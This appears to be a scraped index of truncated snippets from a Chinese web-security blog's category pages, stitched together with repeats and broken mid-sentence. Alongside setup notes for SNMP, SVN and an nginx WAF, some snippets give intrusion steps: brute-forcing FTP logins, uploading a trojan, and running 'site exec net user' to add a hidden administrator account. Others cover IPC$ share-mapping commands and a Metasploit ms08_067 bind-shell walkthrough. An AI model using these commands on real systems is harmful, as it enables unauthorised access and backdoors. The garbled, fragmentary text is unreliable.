9l988.com
AAuto | SHOOTER 关注web安全
http://www.9l988.com/archives/category/programming/aauto
SHOOTER BLOG 记录与分享 白帽子技术交流. Class class sogou{ ctor( sogouData ){ if( #sogouData. AAuto代码:(部分函数仅支持VISTA以后版本,XP的未研究) import console; import wsock; import win.version dll = raw.loadDll("Iphlpapi.dll"); GetTcpTable= dll.api("GetTcpTable","INT(struct &pTcpTable, INT &pdwSize. AAuto 代码 import gdip var bmp = gdip.bitmap( " test.gif" ); var count = bmp.totalFrames; / 获取gif动画帧数 for(i=1;count;1){ bmp.selectActiveFrame(i); / 选择某一帧 bmp.save(" " i ".jpg",100) / 保存至本地. 微软的Crypto API封装了很多加密算法,可是网上的文档比较少,找到的代码也有错误....
9l988.com
常用cmd指令 | SHOOTER 关注web安全
http://www.9l988.com/archives/category/programming/常用cmd指令
SHOOTER BLOG 记录与分享 白帽子技术交流. Tasklist 查看当前运行的进程 net start Terminal Services 注: Terminal Services 服务名称 net stop servicename 关闭服务 注 servicename 服务名称 tasklist /svc 查看当前运行的服务 query user 查看当前是否有用户在登录 lo. Mysql file 权限 (1). Linxu shell script (1).
9l988.com
javascript | SHOOTER 关注web安全
http://www.9l988.com/archives/category/programming/javascript
SHOOTER BLOG 记录与分享 白帽子技术交流. 项目使用QQ抓取有一些时间了 营销QQ每天加的人数有限 抓取10000 扔掉的80% 所以想到了临时会话 只要能与客户聊天 就可以 (最终目的) function fun(number){ document.getElementById(number).click(); } . 方法1: [手动] 效果 方法2 [自动] js var clearset = setInterval("j wb()","5000"); ttti=0 function j wb(){ ttti if(ttti= 1){ clearInterval(clearset); } window.l. Document.writeln(" ); document.writeln("body{ display:none! 例如 var result, result2; result = 5 * (2 3); / 这是一个表达式,分别进行了加法和乘法的运算,结果是25。 Alert(result2); / result2等于undefined,声明变量时.
9l988.com
21 | SHOOTER 关注web安全
http://www.9l988.com/archives/category/网络/windows/port/21端口
SHOOTER BLOG 记录与分享 白帽子技术交流. 1、使用S扫描器或者其他扫描器扫描出开了21端口的IP 2、使用IP整理工具把IP整理好 3、使用Xscan扫描器扫描密码 FTP登录上去,传马 Dos 下连接 添加用户 quote site exec net user shooter 123456 /add quote site exec net localgroup administrators shooter /add 以上这. Mysql file 权限 (1). Linxu shell script (1).
9l988.com
LINUX | SHOOTER 关注web安全
http://www.9l988.com/archives/category/网络/linux
SHOOTER BLOG 记录与分享 白帽子技术交流. 1下载snmp安装包 这个地址取下载 http:/ sourceforge.net/projects/net-snmp/files/net-snmp/5.7.1/ 下载这个版本 2.解压安装 解压后的文件列表 3.编译文件 net-snmp-5.7.1目录下的configure是可执行文件,如果想指定程序包的安装路径,那么首先建立相应的文件夹来存放安装信. Ngx lua waf ngx lua waf是我刚入职趣游时候开发的一个基于ngx lua的web应用防火墙。 用途 防止sql注入,本地包含,部分溢出,fuzzing测试,xss,SSRF等web攻击 防止. Root@kali: # service postgresql start 使用ss -ant的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态。 密码保护 msfpayload and msfencode. 密码保护 MSF auxiliary,encoders,nops. 开启以下模块 LoadModule proxy module modu...
9l988.com
端口 | SHOOTER 关注web安全
http://www.9l988.com/archives/category/网络/windows/port
SHOOTER BLOG 记录与分享 白帽子技术交流. 用在select 语句,以及子句where order by hacing 中 update delete 函数中可以将字段名作为字段来用,变量的值就是这个列对应的每一行记录。 IPC$ 1)建立空连接:net use IP ipc$ " /user:" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use IP ipc$ "用户名" /user:"密码" (同样有3个空格)3)映射默认共享:net use z: IP c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$. Tomcat 是什么 omcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器 Tomcat安装 8005是向tomcat发布shutdown命令的 第一个连接器监听8080端口,负责建立HTTP连接。 微软的远程桌面 是为了方便广大计算机管理员远程管理自己的计算机而设定的, 但是只要有管理密码,3389可以为任何有管理密码的人提供服务 33.
9l988.com
网络技术 | SHOOTER 关注web安全
http://www.9l988.com/archives/category/网络
SHOOTER BLOG 记录与分享 白帽子技术交流. 1下载snmp安装包 这个地址取下载 http:/ sourceforge.net/projects/net-snmp/files/net-snmp/5.7.1/ 下载这个版本 2.解压安装 解压后的文件列表 3.编译文件 net-snmp-5.7.1目录下的configure是可执行文件,如果想指定程序包的安装路径,那么首先建立相应的文件夹来存放安装信. Ngx lua waf ngx lua waf是我刚入职趣游时候开发的一个基于ngx lua的web应用防火墙。 用途 防止sql注入,本地包含,部分溢出,fuzzing测试,xss,SSRF等web攻击 防止. 先用 db nmap 扫描下 db nmap -A 192.168.0.94 下来用 db autopwn 试试 找不到db autopwn 就看这里 - - - - - - - - - - - - - - - - - - - - - - - - - - - - . 密码保护 msfpayload and msfencode. Mysql file 权限 (1).
9l988.com
WINDOWS | SHOOTER 关注web安全
http://www.9l988.com/archives/category/网络/windows
SHOOTER BLOG 记录与分享 白帽子技术交流. 1下载snmp安装包 这个地址取下载 http:/ sourceforge.net/projects/net-snmp/files/net-snmp/5.7.1/ 下载这个版本 2.解压安装 解压后的文件列表 3.编译文件 net-snmp-5.7.1目录下的configure是可执行文件,如果想指定程序包的安装路径,那么首先建立相应的文件夹来存放安装信. Ngx lua waf ngx lua waf是我刚入职趣游时候开发的一个基于ngx lua的web应用防火墙。 用途 防止sql注入,本地包含,部分溢出,fuzzing测试,xss,SSRF等web攻击 防止. 远程溢出 windows 服务器 利用模块 exploit/windows/smb/ms08 067 netapi Payload windows/shell/bind tcp 目标操作系统 windows xp 看下目标系统 和 ip地址 ip 192.168.174.151 我们打开 msfconsole 进入 msf show exploits 找.
9l988.com
汇编 | SHOOTER 关注web安全
http://www.9l988.com/archives/category/programming/汇编
SHOOTER BLOG 记录与分享 白帽子技术交流. Import win.ui; import process /*DSG{ */ var winform = .win.form( bottom=539;parent=;right=599;text= AAuto Form ) winform.add( listview={ bgcolor=16777215;bottom=525;right=570;left=18;top=1. Import win.ui; import process /*DSG{ */ var winform = .win.form( bottom=539;parent=;right=599;text= AAuto Form ) winform.add( listview={ bgcolor=16777215;bottom=525;right=570;left=18;top=1. 转]汇编 Ring3 下实现 HOOK API. 1 介绍 1.1 什么叫Hook API? 比较汇编指令 LEA 和 MOV. 汇编指令 LEA 和 MOV. Ioopen() import proc...
9l988.com
服务器环境搭建 | SHOOTER 关注web安全
http://www.9l988.com/archives/category/网络/windows/服务器环境搭建
SHOOTER BLOG 记录与分享 白帽子技术交流. 1下载snmp安装包 这个地址取下载 http:/ sourceforge.net/projects/net-snmp/files/net-snmp/5.7.1/ 下载这个版本 2.解压安装 解压后的文件列表 3.编译文件 net-snmp-5.7.1目录下的configure是可执行文件,如果想指定程序包的安装路径,那么首先建立相应的文件夹来存放安装信. Ngx lua waf ngx lua waf是我刚入职趣游时候开发的一个基于ngx lua的web应用防火墙。 用途 防止sql注入,本地包含,部分溢出,fuzzing测试,xss,SSRF等web攻击 防止. SVN 环境搭建 分为 服务端和客户端 1.第一步先安装服务端与客户端 服务端下载 subversion 下载下来安装 下载个安装版 一般是msi 结尾或者 exe 结尾 直接安装 安装完目录结构是这样的 客户端360软件管家里有下载 或者其他方式下载安装就好 2.建立版本库 Repository 运行Subversion服务器需要首先要. 1打开Apache conf/http...